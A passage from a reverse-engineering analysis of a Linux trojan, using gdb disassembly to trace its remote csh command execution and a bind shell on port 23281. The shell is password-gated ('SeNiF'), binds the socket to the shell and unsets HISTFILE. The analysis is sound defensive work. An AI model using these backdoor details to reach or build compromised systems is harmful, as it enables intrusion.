    0x80485cb: call 0x80572b0

Since we also know what 0x807e770 is, this all looks like:

    kill(PID_Var_A, 9)

The next call is to 0x8055fbc, which has already been identified as an exit() (still only assumed, but it still seems logical). This ends the parent process from the last fork. I am unsure if this is a bug on behalf of the author. Since we would be the child process from the first fork, PID_Var_A would be 0, so this may not actually work as intended. Perhaps this does kill the child process too, but first thoughts make me believe this is a bug. One way or another, the parent process from the most recent fork is no more. [Turns out this kill DOES work.]

Else (if we were the child process)

We pick up again at 0x80485d8. One of the first things we do is this loop:

    0x80485dc: movb 0xfffff002(%ebx,%ebp,1),%al
    0x80485e3: movb %al,0xfffff000(%ebx,%ebp,1)
    0x80485ea: incl %ebx
    0x80485eb: cmpl $0x18d,%ebx
    0x80485f1: jle 0x80485dc

This may be as simple as an optimised memcpy(). All it does is copy 0x18e bytes (indices 0 to 0x18d inclusive, assuming %ebx starts at 0) from 0xfffff002(%ebp) to 0xfffff000(%ebp). This effectively shifts the data across by 2 bytes in the buffer that was earlier passed to Data_Manipulation_Function_A. This would make sense considering we earlier used the 2nd byte of the data to determine the switch() outcome.

Following on:

    0x80485f3: pushl $0x80675e6
    0x80485f8: movl 0xffffbb20(%ebp),%ecx
    0x80485fe: pushl %ecx
    0x80485ff: pushl $0x80675f5
    0x8048604: leal 0xfffff800(%ebp),%ebx
    0x804860a: pushl %ebx
    0x804860b: call 0x804f808

0x804f808 is an unidentified function.
In earlier trying to follow it, I found it too complex and long to follow, so instead we'll look at some of its parameters:

    (gdb) x/1s 0x80675e6
    0x80675e6: "/tmp/.hj237349"
    (gdb) x/1s 0x80675f5
    0x80675f5: "/bin/csh -f -c \"%s\" 1> %s 2>&1"

0xffffbb20(%ebp) is a pointer to 0xfffff000(%ebp), which is the buffer that was earlier passed to Data_Manipulation_Function_A.

0xfffff800(%ebp) is the buffer that was earlier passed to the recv() function.

The string contents at 0x80675f5 stand out and give us a fairly reasonable guess as to what the function is (i.e. *printf/*scanf). As a guess, one would expect that 0xfffff000(%ebp), now that it has been shifted two bytes to the left, is a string command sent by the blackhat. We still cannot assume an sprintf() until:

    0x8048610: pushl %ebx
    0x8048611: call 0x80557e8

This call is as yet unidentified, so in following it, we see it issues the interrupts for: sigaction, sigprocmask, fork, execve. Since it's not a direct execve call (and given the redirection string that was passed to it), it is assumed the function at 0x80557e8 is system(). This is not verified, but given the amount of code involved with this function, I'm more tempted to assume than to verify it...

Also, the earlier function at 0x804f808 is now also assumed to be an sprintf(). Given all the work done to the buffer passed to it (shifting it), and the string parameters being located on the heap, I cannot see a reason for an sscanf(); an sprintf() would have to be the case in order for system() to function correctly.

So assuming all the above, our execution looks like:

    /bin/csh -f -c "somecommand" 1> /tmp/.hj237349 2>&1

This is a simple cshell command redirection into /tmp/.hj237349, which at first glance might seem kind of pointless; however:

    0x8048616: pushl $0x8067614
    0x804861b: pushl $0x80675e6
    0x8048620: call 0x804f620

The call is fairly long, so to cut a long story short:

    0x80572e0: movl $0x5,%eax
    0x80572ee: int $0x80

We end up with an open() call.
The parameters to this call look like this:

    (gdb) x/1s 0x8067614
    0x8067614: "rb"
    (gdb) x/1s 0x80675e6
    0x80675e6: "/tmp/.hj237349"

It's fairly clear this is a fopen() call, however it was only quickly skimmed through and could be something else. After checking that the fopen() call succeeds and doing some parameter setup, we end up calling 0x804f6d4. This function is an unknown, and unfortunately the call at 0x8061d42 makes life a little more difficult. Instead of trying to work out what the internals of this function do, we'll look at the parameters that are pushed onto the stack before it is called:

    0x8048644: movl 0xffffbb24(%ebp),%ecx
    0x804864a: pushl %ecx
    0x804864b: pushl $0x18e
    0x8048650: pushl $0x1
    0x8048652: leal 0xfffff800(%ebp),%eax
    0x8048658: pushl %eax
    0x8048659: call 0x804f6d4

This looks like:

    function(Buffer, 1, 0x18e, 0xffffbb24(%ebp))

This still doesn't help much until we realise what 0xffffbb24(%ebp) actually is. Just after the fopen():

    0x8048625: movl %eax,0xffffbb24(%ebp)

So, it looks like 0xffffbb24(%ebp) is our file handle (the value returned by fopen()). Now an immediate assumption would be an fread or fwrite. Considering the "rb" mode the file was opened with, we'll assume 0x804f6d4 is an fread().

We then engage in a memcpy-type arrangement:

    0x8048670: movb 0xfffff800(%ebx,%ebp,1),%al
    0x8048677: movb %al,0xfffff002(%ebx,%ebp,1)
    0x804867e: incl %ebx
    0x804867f: cmpl $0x18d,%ebx
    0x8048685: jle 0x8048670

This copies the data read from the file into the buffer from 0xfffff002(%ebp) onwards. We then pass a pointer to this buffer, starting at 0xfffff000(%ebp), to the function at 0x804a194 (Data_Manipulation_Function_B), followed by a call of Network_Function_A.

It is at this point I am almost certain that Data_Manipulation_Function_A is some kind of decoder, and Data_Manipulation_Function_B is some kind of encoder. The encoded data would be passed to Network_Function_A, which would then pass the encoded packets on to the blackhat.
We can't take this as an exact conclusion until those three functions have been analysed in depth, however it's looking like a pretty solid guess.

Jumping back to just before we encode the data, however, something interesting happens. The code seems to keep tabs on %edi:

    0x8048687: testl %edi,%edi
    0x8048689: jne 0x804869c

It seems to act as a toggle. At first I didn't catch the second loop and thus couldn't understand this, but when one realises that there is a loop that continuously reads 0x18e bytes from the file and sends however many bytes were read, then reads another 0x18e bytes (if available) and sends those, and so on, the purpose of %edi becomes clear. As the first packet is created, the 2nd byte is set to a 3, and %edi is set to 1. Changing %edi like this lets the trojan know to send the next section of up to 0x18e bytes with the 2nd byte set to a 4. This is undoubtedly for the benefit of any client listening to the response. We can immediately assume something about the client from this, but we'll look at client conclusions later.

A call to what we currently believe to be a usleep() implementation is then done with a sleep time of 0x61a80 (400000 microseconds, i.e. 0.4 seconds).

When we finally finish reading all the data from the redirection file, we fall out of the loop and end up at 0x80486f9. From here:

    0x80486f9: movl 0xffffbb24(%ebp),%edx
    0x80486ff: pushl %edx
    0x8048700: call 0x804f540

The function call is unknown at this time, but 0xffffbb24(%ebp) looks familiar, and looking back to the fopen() and fread(), this would have to be the file descriptor. One could immediately assume this function call is an fclose(), but even I'm not into those sorts of jumpy assumptions. Following the long call chain associated with this function reveals nothing! It is an extremely long function, with the only system call found being munmap(). A lot of variable calls are made, which makes tracking this function extremely difficult.
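The identification method used throughout this analysis (read the value loaded into %eax ahead of an int $0x80, then look it up in asm/unistd.h) can be sketched as a small lookup table. The numbers are the i386 Linux values; the identify() helper and the selection of entries are only illustrative, and socketcall (0x66) additionally needs the sub-call number that the wrappers load into %ebx.

```python
# i386 Linux syscall numbers (asm/unistd.h) for calls met in this analysis.
SYSCALLS = {
    0x01: "exit", 0x02: "fork", 0x05: "open", 0x06: "close",
    0x0a: "unlink", 0x0b: "execve", 0x25: "kill", 0x31: "geteuid",
    0x3f: "dup2", 0x5a: "mmap", 0x5b: "munmap", 0x66: "socketcall",
}

# Sub-call numbers passed in %ebx when %eax is 0x66 (linux/net.h).
SOCKETCALLS = {
    1: "socket", 2: "bind", 3: "connect", 4: "listen", 5: "accept",
    9: "send", 10: "recv", 14: "setsockopt",
}


def identify(eax, ebx=None):
    """Hypothetical helper: name the syscall selected by %eax (and %ebx)."""
    name = SYSCALLS.get(eax, "unknown(%#x)" % eax)
    if name == "socketcall" and ebx is not None:
        name = SOCKETCALLS.get(ebx, "socketcall(%d)" % ebx)
    return name


print(identify(0x25))       # kill
print(identify(0x06))       # close
print(identify(0x66, 0xe))  # setsockopt
```

A function that never reaches an int $0x80 with a recognisable number, like the one just examined, simply cannot be named this way and has to be judged from its arguments instead.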
One would have been hoping for a %eax of 6 with an int $0x80 to show up, but it was not to be. It's not enough to simply call it a definite fclose() simply because it 'fits' into what one would expect. The author could have buggy code! But a massive assumption will be needed for the moment until runtime debugging can confirm or deny... Returning back to the case code at 0x8048705: 0x8048705: pushl $0x80675e6 0x804870a: call 0x80573bc (gdb) x/1s 0x80675e6 0x80675e6: "/tmp/.hj237349" A file delete would fit in nicely here too, BUT :) Once again 0x80573bc is unidentified soooo..... 0x80573c0: movl $0xa,%eax 0x80573c8: int $0x80 This seems to be the only thing this function does. Wow. Just when i was losing faith in disassembling calls to see what they do, one works out. This upon consultation with ones asm/unistd.h shows it to be an unlink("/tmp/.hj237349"). Next please: 0x8048712: pushl $0x0 0x8048714: call 0x8057554 Another function we have no references for. So we follow and: 0x8057558: movl $0x1,%eax 0x8057560: int $0x80 None other than exit() code. We already have a function we assumed was exit()... Can be easily explained, they're both exit() code. :) The exit() at 0x8057554 is very simplistic with no atexit() checks so it could only be an _exit() call. This doesn’t confirm the currently assumed code at 0x8055fbc is indeed exit() however. This use of _exit() shows us some information about the author of this binary too. More about this in Author Conclusions later. End of child process. A summary of this case section is definitely needed: Uses csh to execute a string (probably passed encoded within the same packet) Redirects output to /tmp/.hj237349 Opens /tmp/.hj237349 Reads /tmp/.hj237349 in 0x18e(398) byte increments Appears to possibly 'encode' each read 398 byte buffer using Data_Manipulation_Function_B, and passes the probable 'output' of this function to Network_Function_A. 
Network_Function_A then most likely puts the supplied buffer into a packet and forwards it onto the blackhat. The actual buffer construction (which would explain the odd number of 398) seems to have 2 bytes at the front, followed by the 398 byte fread() buffer contents. The first byte is unknown and appears to strangely enough end up being the first byte of the command executed. The second byte is: 3 for the first 398 byte buffer. 4 for every buffer thereafter. It should be remembered that the code before all this occurs included a kill() that would occur after a 10 second sleep. In looking up the man page for kill(), i learn something new ;) When the pid passed to kill is 0, the signal is sent to all processes whose group ID is the same as the sender. This is a pretty effective way to ensure a system() command doesn't stay running. Pretty impressive case-section, compared to what I've seen in other trojans anyway. 0x0804871c: Straight into it: 0x804871c: cmpl $0x0,0x807e774 0x8048723: jne 0x8048eb8 0x807e774 is an unknown variable. Given the reference to 0x807e778, it would be fair to believe 0x807e774 to be a maximum of 4 bytes. We'll call it PID_Var_B [Changed to this name - you will see why in a minute] So the first thing this case section does, is check PID_Var_B. If it is nonzero, it'll jmp to 0x8048eb8 which once again is the end of the switch(), involving a sleep(), then jmping back to the recv(). Looking at the following: 0x8048729: movl $0x4,0x807e778 0x8048733: call 0x80571e8 Firstly sets 0x807e778 (We will term this as Global_C) to 4 [This just happens to also be the switch()'s case #4 - watch this space] The call to 0x80571e8 we have already worked out to be a fork(). 
So once again it looks like we're going to fork whatever this case does into its own process:

    0x8048738: movl %eax,0x807e774
    0x804873d: testl %eax,%eax
    0x804873f: jne 0x8048eb8

If we are the parent process, we will end up with the PID of the child in PID_Var_B (hence why we named it this earlier), and will jmp back out of the switch() ready to sleep and recv() again. If we are the child process however:

    0x8048745: leal 0xffffbb44(%ebp),%edi
    0x804874b: leal 0xfffff000(%ebp),%esi
    0x8048751: cld
    0x8048752: movl $0x3f,%ecx
    0x8048757: repz movsl %ds:(%esi),%es:(%edi)
    0x8048759: movsw %ds:(%esi),%es:(%edi)
    0x804875b: movsb %ds:(%esi),%es:(%edi)

We copy 0x3f*4 bytes (252 bytes) from 0xfffff000(%ebp) (%esi, the source) to 0xffffbb44(%ebp) (%edi, the destination). A further 3 bytes (a word, then a byte) are then strangely copied in a separate method directly after. 0xffffbb44(%ebp) is an unknown, but can be assumed to mark the start of a buffer due to the copying of a large portion of memory. The size of this buffer is not known but should be at least 255 bytes long (the amount of data copied). This variable will be assigned the name of Buffer_B. The source for the data copy, 0xfffff000(%ebp), is the well known buffer that was passed to Data_Manipulation_Function_A much earlier.

Strangely enough, yet another copy loop is started:

    0x8048760: movb 0xffffbb4d(%ebx,%ebp,1),%al
    0x8048767: movb %al,0xffffbb44(%ebx,%ebp,1)
    0x804876e: incl %ebx
    0x804876f: cmpl $0xfe,%ebx
    0x8048775: jle 0x8048760

%ebx starts off at 0. The code's purpose seems to be to shift the contents of the buffer to the left by 9 bytes. This would indicate that Buffer_B is actually longer than 255 bytes: the last byte read is at offset 254+9 (263), so it has to be at least 264 bytes. Being such an odd number, the buffer is assumed to be somewhat larger.

After all this effort, we're left with Buffer_B containing a 9 byte left-shifted copy of some buffer (probably decoded data) from Data_Manipulation_Function_A. The rest of this section focuses on setting up a call.
It starts off simple, pushing a leal of Buffer_B onto the stack so obviously this function uses this buffer. The next bit is strange, with single bytes starting from 0xfffff002(%ebp) to 0xfffff008(%ebp) being pushed onto the stack, one at a time, obviously in reverse stack order. A 0 is stacked midway too. The actual function call looks like this: function(*0xfffff002(%ebp), *0xfffff003(%ebp), *0xfffff004(%ebp), *0xfffff005(%ebp), 0, *0xfffff006(%ebp), *0xfffff007(%ebp), *0xfffff008(%ebp), 0xffffbb44(%ebp)) The values actually passed were movzbl'd so it's assumed they are single bytes (makes sense considering the individual push's). The actual function call of 0x8049174 contains several calls including: 0x8049213: call 0x8056cf4 which matches a socket() call. The function is long and will most certainly be analysed later in the Function Analysis section. This call has been given the name of Network_Function_B. After this function completes: 0x80487c0: pushl $0x0 0x80487c2: call 0x8057554 This function has already been identified as _exit(), which should end up terminating this child process. 0x080487c8: This case section upon first glance is almost identical to the case code just analysed at 0x0804871c. Once again, it looks at PID_Var_B, and if it is non-zero (might indicate something else is running!), it will simply return back into the main recv() loop. We set Global_C to 5 (This is also the 5th case statement...). Otherwise, it'll fork off and do a similar copy with one difference: 0x804880c: movb 0xffffbb51(%ebx,%ebp,1),%al 0x8048813: movb %al,0xffffbb44(%ebx,%ebp,1) 0x804881a: incl %ebx 0x804881b: cmpl $0xfe,%ebx 0x8048821: jle 0x804880c The difference? The starting position for the read. It is 13 bytes in front, so the effect of this loop is to shift the data in Buffer_B left by 13 bytes (as opposed to 9 in the previous case). This code is extremely similar to the previous case statement, but now it all changes. 
A different function is called, one at 0x80499f4. This function, just like the one at 0x8049174 (Network_Function_B), contains calls to socket() (0x8056cf4). Therefore we will name it Network_Function_C and analyse it in the Function Analysis section. The stack setup makes the function call look like this:

    function(*0xfffff002(%ebp), *0xfffff003(%ebp), *0xfffff004(%ebp),
             *0xfffff005(%ebp), *0xfffff006(%ebp), *0xfffff007(%ebp),
             *0xfffff008(%ebp), *0xfffff009(%ebp), *0xfffff00a(%ebp),
             *0xfffff00b(%ebp), *0xfffff00c(%ebp), 0xffffbb44(%ebp))

0xffffbb44(%ebp) is of course Buffer_B. It's a bit strange the way so many individual bytes are passed to the function when it would have had so much less overhead to pass them as a whole. Nevertheless, this case section finishes identically to the previous one, with a call to 0x8057554 aka _exit().

0x08048894:

As with what seems to be standard:

    0x8048894: cmpl $0x0,0x807e774
    0x804889b: jne 0x8048eb8

We check PID_Var_B and if it is not zero (assumed to mean another case section is running), this case section will terminate, and control will be passed back to the main recv() loop. Otherwise (if no other case section is running), we go straight into the following:

    0x80488a1: movl $0x6,0x807e778

0x807e778 matches up with our Global_C, last seen being set to 5 in the previous case section. We set it equal to 6. Coincidentally, this is the 6th case statement (Are we seeing a pattern yet?).

The following code is fairly easily explained:

    0x80488ab: pushl $0x1
    0x80488ad: pushl $0x11
    0x80488af: call 0x80569bc
    0x80488b4: call 0x80571e8

The first call has been seen many times before, it is once again a:

    signal(SIGCHLD, SIG_IGN)

The second call matches up with a fork(). For the parent process, the following has significance:

    0x80488b9: movl %eax,0x807e774

Effectively storing the PID of the child into PID_Var_B.
The parent process will then jump back into the main recv() loop while the child continues on: 0x80488c9: call 0x805733c 0x80488ce: pushl $0x1 0x80488d0: pushl $0x11 0x80488d2: call 0x80569bc 0x805733c corresponds to an assumed setsid() and the next three lines as before, correspond to a SIGCHLD ignore. Now things get interesting: 0x80488d7: movw $0x2,0xffffee38(%ebp) 0x80488e0: addl $0x8,%esp 0x80488e3: movw $0xf15a,0xffffee3a(%ebp) 0x80488ec: movl $0x0,0xffffee3c(%ebp) 0x80488f6: movl $0x1,0xffffbb40(%ebp) 0xffffee38(%ebp) is an unknown at the moment, as are 0xffffee3a(%ebp), 0xffffee3c(%ebp), and 0xffffbb40(%ebp). Size predictions of these refereces could be made, however skimming through the rest of the code indicates no need to bother (You'll soon see why). 0x8048900: pushl $0x0 0x8048902: pushl $0x1 0x8048904: pushl $0x2 0x8048906: call 0x8056cf4 0x804890b: movl %eax,0xffffbb38(%ebp) 0x8056cf4 is a socket() call, therefore the stack indicates: socket(AF_INET, SOCK_STREAM, 0) The socket descriptor is then stored at 0xffffbb38(%ebp). Continuing: 0x8048911: pushl $0x1 0x8048913: pushl $0x11 0x8048915: call 0x80569bc 0x804891a: pushl $0x1 0x804891c: pushl $0x11 0x804891e: call 0x80569bc Yet again, the author ignores SIGCHLD twice for some reason. More ignores follow: 0x8048923: pushl $0x1 0x8048925: pushl $0x1 0x8048927: call 0x80569bc 0x804892c: addl $0x24,%esp 0x804892f: pushl $0x1 0x8048931: pushl $0xf 0x8048933: call 0x80569bc 0x8048938: pushl $0x1 0x804893a: pushl $0x2 0x804893c: call 0x80569bc These are signal ignore calls for HUP, TERM, and INT. 
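The signal() calls in this section all have the same shape: a signal number, followed by a handler value of 1. A minimal sketch of the decoding, assuming the i386 Linux signal numbers and that the handler value 1 is SIG_IGN; the tables and the decode_signal_call() name are illustrative only.

```python
# i386 Linux signal numbers for the values pushed in this section.
SIGNALS = {0x1: "SIGHUP", 0x2: "SIGINT", 0x9: "SIGKILL",
           0xf: "SIGTERM", 0x11: "SIGCHLD"}

# Special handler values from signal.h.
HANDLERS = {0: "SIG_DFL", 1: "SIG_IGN"}


def decode_signal_call(signum, handler):
    """Render the two pushed values as a C-style signal() call."""
    return "signal(%s, %s)" % (SIGNALS.get(signum, hex(signum)),
                               HANDLERS.get(handler, hex(handler)))


# (signum, handler) pairs in the order the calls appear after socket().
# The handler is pushed first, so it is the second C argument.
for signum, handler in [(0x11, 1), (0x11, 1), (0x1, 1), (0xf, 1), (0x2, 1)]:
    print(decode_signal_call(signum, handler))
```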
Finally something more interesting:

    0x8048941: pushl $0x4
    0x8048943: leal 0xffffbb40(%ebp),%eax
    0x8048949: pushl %eax
    0x804894a: pushl $0x2
    0x804894c: pushl $0x1
    0x804894e: movl 0xffffbb38(%ebp),%ecx
    0x8048954: pushl %ecx
    0x8048955: call 0x8056c9c

0x8056c9c is as yet unidentified, so:

    0x8056cc2: movl $0xe,%edx
    0x8056cca: movl $0x66,%eax
    0x8056ccf: movl %edx,%ebx
    0x8056cd1: int $0x80

0x66 in %eax corresponds to a socketcall. The 0xe in %ebx is for a SYS_SETSOCKOPT. Returning to the case code and reconstructing the call:

    setsockopt(*0xffffbb38(%ebp), 1, 2, 0xffffbb40(%ebp), 4)

To put some perspective on the parameters:

    setsockopt(int s, int level, int optname, const void *optval, socklen_t optlen)

Looking at previous assignments to these memory locations, we can now see the following:

    *0xffffbb38(%ebp) is the socket returned by the socket() call.
    1 corresponds to a level of SOL_SOCKET
    2 corresponds to an option of SO_REUSEADDR
    0xffffbb40(%ebp) points to a value that was earlier set to 1
    4 corresponds to the length of *0xffffbb40(%ebp).

This appears to enable re-use of a local address that is already bound, possibly to try to prevent clashes with other applications or other instances of this binary.

The next call setup looks like this:

    0x804895d: pushl $0x10
    0x804895f: leal 0xffffee38(%ebp),%eax
    0x8048965: pushl %eax
    0x8048966: movl 0xffffbb38(%ebp),%edx
    0x804896c: pushl %edx
    0x804896d: call 0x8056a74

0x8056a74 is an unknown function...

    0x8056a8d: movl $0x2,%edx
    0x8056a95: movl $0x66,%eax
    0x8056a9a: movl %edx,%ebx
    0x8056a9c: int $0x80

Or rather, "was" an unknown function :) Looking up a type 2 socketcall shows it does a SYS_BIND. The function does nothing else, so it's more than likely a bind() function. Looking at a generic bind() call:

    int bind(int s, const struct sockaddr *addr, socklen_t addrlen)

Now inserting the relevant parts:

    bind(*0xffffbb38(%ebp), 0xffffee38(%ebp), 0x10)

*0xffffbb38(%ebp) is self explanatory as the socket descriptor.
0xffffee38(%ebp) however should have some interesting information, especially what port this socket is going to be bound to! This would be fairly easy to look up during a runtime analysis, but it's not much harder to do now. We saw earlier in this case section the following:

    0x80488d7: movw $0x2,0xffffee38(%ebp)
    0x80488e3: movw $0xf15a,0xffffee3a(%ebp)
    0x80488ec: movl $0x0,0xffffee3c(%ebp)

sockaddr structure:

    struct sockaddr {
        unsigned short sa_family;
        char sa_data[14];
    };

As we saw, the first word was set to a 2, indicating a family of AF_INET. The bind function will now use the family structure for this type, sockaddr_in.

sockaddr_in structure:

    struct sockaddr_in {
        short int sin_family;
        unsigned short int sin_port;
        struct in_addr sin_addr;
        unsigned char __pad[...];
    };

The next word put into the buffer corresponds to the port. As we saw, 0xf15a is placed into this location, which translates to.... Almost forgot byte ordering. The movw stores 0xf15a on a little endian host, so the bytes in memory are 0x5a 0xf1. sin_port is read in network (big endian) byte order, giving 0x5af1, which translates into 23281. The movl of 0 that follows fills sin_addr, i.e. INADDR_ANY.

    0x8048972: pushl $0x3
    0x8048974: movl 0xffffbb38(%ebp),%ecx
    0x804897a: pushl %ecx
    0x804897b: call 0x8056b04

Once again this function is unknown. It wouldn't take much to guess what it is, but let's prove rather than guess:

    0x8056b17: movl $0x4,%edx
    0x8056b1f: movl $0x66,%eax
    0x8056b24: movl %edx,%ebx
    0x8056b26: int $0x80

As one might have expected, this is a SYS_LISTEN call. With parameters in place, it looks like this:

    listen(*0xffffbb38(%ebp), 3)

*0xffffbb38(%ebp), once again, is the socket descriptor of our SOCK_STREAM socket that is bound to 23281.
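The port arithmetic can be double-checked with a few lines of Python. This is only a sketch: it rebuilds the first eight bytes of the structure exactly as the three mov instructions would lay them out on a little endian host, then reads the fields back the way the kernel interprets a sockaddr_in. The variable names are made up for the example.

```python
import struct

# Bytes written by movw $0x2, movw $0xf15a and movl $0x0 on a
# little-endian host.
raw = struct.pack("<HHI", 0x2, 0xf15a, 0x0)

# sin_family is in host order; sin_port and sin_addr are in network
# (big-endian) order.
(family,) = struct.unpack_from("<H", raw, 0)
(port,) = struct.unpack_from(">H", raw, 2)
(addr,) = struct.unpack_from(">I", raw, 4)

print(family)  # 2 (AF_INET)
print(port)    # 23281
print(addr)    # 0 (INADDR_ANY)
```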
As expected after a listen:

    0x8048984: leal 0xffffbb3c(%ebp),%eax
    0x804898a: pushl %eax
    0x804898b: leal 0xffffee28(%ebp),%eax
    0x8048991: pushl %eax
    0x8048992: movl 0xffffbb38(%ebp),%edx
    0x8048998: pushl %edx
    0x8048999: call 0x8056a2c

As could be guessed, the code at 0x8056a2c contains:

    0x8056a45: movl $0x5,%edx
    0x8056a4d: movl $0x66,%eax
    0x8056a52: movl %edx,%ebx
    0x8056a54: int $0x80

This is a SYS_ACCEPT socketcall. Putting parameters into the right spots:

    accept(*0xffffbb38(%ebp), 0xffffee28(%ebp), 0xffffbb3c(%ebp))

First is obviously the socket, the next should be a sockaddr structure, while the last should have been set to the size of that structure (This was verified as done earlier at 0x8048171).

If this accept fails with a return of 0, a jump to an exit() occurs. Otherwise, we launch straight into a call to 0x80571e8 (a fork()). If we end up being the parent of that call, we jump back up to 0x8048984 for the next accept() call. If we are the child:

    0x80489b8: pushl $0x0
    0x80489ba: pushl $0x13
    0x80489bc: leal 0xffffbc44(%ebp),%eax
    0x80489c2: pushl %eax
    0x80489c3: movl 0xffffbb34(%ebp),%ecx
    0x80489c9: pushl %ecx
    0x80489ca: call 0x8056b44

0x8056b44 has already been identified as a recv() call. In trying to identify 0xffffbb34(%ebp) (which should be a socket), we look back to just after the accept() call:

    0x804899e: movl %eax,0xffffbb34(%ebp)

As is fairly obvious, the recv() is done upon the accept()'d socket. 0xffffbc44(%ebp) would be some buffer which does not seem to be used anywhere prior. The 0x13 indicates a read of at most 19 bytes.

Starting at 0x80489cf, something peculiar occurs. Starting at 0xffffbc44(%ebp), we look at one byte at a time. If the byte matches a 0xa or a 0xd ('\n' or '\r'), we replace it with a 0. This is a simple string termination. The strange bit occurs if the character is NOT one of these two characters:

    0x80489f7: incb 0xffffbc44(%ebx,%ebp,1)

The byte in the buffer is incremented by 1. The loop continues for all 0x13 bytes.
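The per-byte processing just described can be sketched as follows. This is a reading of the loop as described above, not a verified reimplementation: the transform() name is made up, and padding a short input with zero bytes is an assumption made purely so the example has 0x13 bytes to walk over (the real buffer would hold whatever was on the stack).

```python
def transform(data, length=0x13):
    """Mimic the loop at 0x80489cf on a received buffer.

    CR and LF become NUL; every other byte is incremented by one,
    wrapping at 8 bits as incb would.
    """
    # Assumption: pad (or truncate) the input to the 0x13 bytes the loop visits.
    buf = bytearray(data.ljust(length, b"\x00")[:length])
    for i in range(length):
        if buf[i] in (0x0a, 0x0d):
            buf[i] = 0
        else:
            buf[i] = (buf[i] + 1) & 0xff
    return bytes(buf)


out = transform(b"abc\r\n")
print(out[:5])  # b'bcd\x00\x00'
```

Note that only the line terminators end up as NUL; anything after them in the buffer is incremented like any other byte.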
When this is done, we start on what looks to be a byte for byte compare process:

    0x8048a04: leal 0xffffbc44(%ebp),%esi
    0x8048a0a: movl $0x8067617,%edi
    0x8048a0f: movl $0x6,%ecx
    0x8048a14: cld
    0x8048a15: testb $0x0,%al
    0x8048a17: repz cmpsb %ds:(%esi),%es:(%edi)
    0x8048a19: je 0x8048a44

%esi and %edi are obviously the buffer starting points. %esi is loaded with the buffer (that just experienced a byte-by-byte increment). %edi:

    (gdb) x/1s 0x8067617
    0x8067617: "TfOjG"

%ecx is loaded with 6. This is the number of bytes that will be compared under the repz. Coincidentally, the string at 0x8067617 is also 6 bytes long once its terminating NUL is counted (hrmm....interesting). Balancing the equation, since we were incrementing our input and then comparing to "TfOjG", we can decrement the "TfOjG" characters by 1 to find out just what input this connection is expecting. Doing so shows the expected input to be "SeNiF". Still makes no sense, perhaps it means something in another language.

If the comparison fails:

    0x8048a1b: pushl $0x0
    0x8048a1d: pushl $0x4
    0x8048a1f: pushl $0x806761d
    0x8048a24: movl 0xffffbb34(%ebp),%edx
    0x8048a2a: pushl %edx
    0x8048a2b: call 0x8056bf0

0x8056bf0 is unidentified, so:

    0x8056c0f: movl $0x9,%edx
    0x8056c17: movl $0x66,%eax
    0x8056c1c: movl %edx,%ebx
    0x8056c1e: int $0x80

This is all the function seems to do system-wise. The above corresponds to a SYS_SEND socketcall. Looking at the values, once again, we see the accept()'d socket, the value of 0x806761d, and 4. 4 is the number of bytes to be sent, so 0x806761d should be the buffer to send out:

    (gdb) x/4b 0x806761d
    0x806761d: 0xff 0xfb 0x01 0x00

Strange bytes which do not obviously correspond to anything in the code so far, although 0xff 0xfb 0x01 is what the Telnet sequence IAC WILL ECHO looks like on the wire. The buffer at 0x806761d appears unused prior to this, so hopefully the contents of this buffer will become clearer later.
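Going back to the comparison against "TfOjG", the "decrement by 1" step is easy to reproduce. A minimal sketch, where STORED is simply the string dumped from 0x8067617 and the other names are made up for the example:

```python
STORED = b"TfOjG"  # string found at 0x8067617

# The binary adds 1 to each input byte before comparing, so the expected
# input is the stored string with 1 subtracted from each byte.
expected = bytes((b - 1) & 0xff for b in STORED)
print(expected)  # b'SeNiF'

# Round trip: incrementing the recovered input gives the stored string back.
assert bytes((b + 1) & 0xff for b in expected) == STORED
```

The sixth compared byte is the NUL terminator, which on the input side would come from the '\n' or '\r' that the earlier loop replaced with 0.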
Keeping in line with the fail-end of the byte comparison earlier: 0x8048a30: movl 0xffffbb34(%ebp),%ecx 0x8048a36: pushl %ecx 0x8048a37: call 0x8057160 0x8048a3c: pushl $0x1 0x8048a3e: call 0x8055fbc After the send(), it looks like we call a close() on the accept()'d socket, followed by an exit(). The interesting things occur if the byte comparison succeeds: 0x8048a44: pushl $0x0 0x8048a46: movl 0xffffbb34(%ebp),%edx 0x8048a4c: pushl %edx 0x8048a4d: call 0x805718c Yet again, this function is unknown: 0x8057190: movl $0x3f,%eax 0x805719b: int $0x80 Now it can be identified however, as a dup2(). The parameters indicate the accept()'d socket is dup2()'d as stdin. The same setup and call is done for 1, and 2 so that when they'd finished, stdin, stdout, and stderr are all dup2()'d to the accept()'d socket. Following this: 0x8048a6e: pushl $0x1 0x8048a70: pushl $0x8067621 0x8048a75: pushl $0x8067651 0x8048a7a: call 0x804a2a8 Another function that needs identifying, so: 0x804a2a8 calls: 0x805652c: Does nothing of interest. 0x805bd74: Calls 0x805ba88 Calls 0x8065cec 0x8065d1c: movl $0x5a,%eax 0x8065d23: int $0x80 Identified as an mmap() Calls 0x805bbf4 Calls variable 0x805c290: Calls 0x805bb34 Calls 0x8066154 0x8066158: movl $0x5b,%eax 0x8066163: int $0x80 Identified as munmap() Calls 0x8056e64 Does nothing of Interest Calls 0x805c944 Calls variable So, after all that, we're left none the wiser. Hopefully the stack will help in identification. Three values are pushed: 0x1, 0x8067621, 0x8067651. This would look like: function(0x8067651, 0x8067621, 0x1) Parameters: (gdb) x/1s 0x8067621 0x8067621: "/sbin:/bin:/usr/sbin:/usr/bin:/usr/local/bin/:." (gdb) x/1s 0x8067651 0x8067651: "PATH" I think this gives it away as most probably a setenv(). As such it will be assumed as setenv() for the rest of the analysis. Continuing: 0x8048a7f: addl $0x24,%esp 0x8048a82: pushl $0x8067656 0x8048a87: call 0x804a48c 0x804a48c is also an unknown function. 
We'll look at the parameter first this time (probably easier): (gdb) x/1s 0x8067656 0x8067656: "HISTFILE" While the function probably should be analysed from an assembly viewpoint, it would probably turn out to be an unsetenv(). This may need to be reviewed later to ensure nothing tricky is done, but at this point in time, 0x804a48c is going to be assumed as unsetenv(). Continuing: 0x8048a8c: pushl $0x1 0x8048a8e: pushl $0x806765f 0x8048a93: pushl $0x8067665 0x8048a98: call 0x804a2a8 Finally, a recognisable function, one believed to be setenv(). A quick look at the parameters: (gdb) x/1s 0x8067665 0x8067665: "TERM" (gdb) x/1s 0x806765f 0x806765f: "linux" An obvious setting of terminal type to "linux". It should be noted both this setenv() and the previous included a 1 on the stack. This simply indicates that if a environment variable already existed, it would be overwritten. Continuing: 0x8048a9d: pushl $0x0 0x8048a9f: pushl $0x806766a 0x8048aa4: pushl $0x806766d 0x8048aa9: call 0x80555fc This function is unknown, so we'll look at the parameters first: (gdb) x/1s 0x806766d 0x806766d: "/bin/sh" (gdb) x/1s 